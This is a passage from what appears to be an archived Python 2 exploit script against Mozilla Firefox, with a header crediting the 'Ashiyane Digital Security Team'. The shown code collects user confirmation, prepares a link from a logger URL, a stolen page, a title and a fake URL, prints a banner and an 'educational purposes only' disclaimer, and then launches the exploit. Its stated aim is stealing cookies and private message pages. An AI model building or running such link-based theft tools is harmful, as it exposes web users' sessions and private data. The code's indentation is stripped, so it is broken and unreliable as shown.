correct = raw_input(ColourMe("Is it correct?(","white")+ColourMe("y","green")+ColourMe("/","white")+ColourMe("n","red")+ColourMe("):","white"))
while(correct!="y"):
if correct=="n":
print ColourMe("Sorry.Restart the exploit and try again.\n"+sadman,"red")
exit()
else:
correct = raw_input(ColourMe("Is it correct?(","white")+ColourMe("y","green")+ColourMe("/","white")+ColourMe("n","red")+ColourMe("):","white"))
PrepareLink(logger_link,stolen_page,title,fake_url)
banner="""#######
# # # ##### # #### # #####
# # # # # # # # # #
##### ## # # # # # # #
# ## ##### # # # # #
# # # # # # # # #
####### # # # ###### #### # #"""
terms="\n\nThis exploit is written for educational purposes only.We are NOT responsible for Illegal usages.Use it at your own risk.\n"
info="""
######################
# Exploit Title : Mozilla Firefox Pop-up/New_tab Link Based Informatin Leaking Attack Exploit
# Exploit Author : Ashiyane Digital Security Team
# Vendor Homepage : https://www.mozilla.org/en-US/
# Google Dork : N/A
# Date: 13 Mar 2017
# Tested On : Kali linux 2 32bit_Mozilla Firefox v52.0(Release Date:March 7, 2017),Mozilla Firefox 45.3.0,Mozilla Firefox 45.3.0|Windows 7 32bit_Mozilla Firefox 45
# Software Link : https://www.mozilla.org/en-US/firefox/products/
# Version : Mozilla Firefox v52.0(Release Date:March 7, 2017),Mozilla Firefox 45.3.0 and probably others
# CVE : N/A
######################
Mozilla Firefox is vulnerable.Exploited links can steal sensitive informations of users such as cookies or pages like private message pages.
######################
# discovered by : Rusputin
######################
"""
print ColourMe(banner, 'blue'),info,ColourMe(terms, 'yellow')
agree = raw_input(ColourMe("Do you accept this?(","white")+ColourMe("y","green")+ColourMe("/","white")+ColourMe("n","red")+ColourMe("):","white"))
while(agree!="y"):
if agree=="n":
print ColourMe("Sorry.You can't use this exploit.\n"+sadman,"red")
exit()
else:
agree = raw_input(ColourMe("Do you accept this?(","white")+ColourMe("y","green")+ColourMe("/","white")+ColourMe("n","red")+ColourMe("):","white"))
print ColourMe("\n\n"+happyman2+"\n\n","green")
Exploit()
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum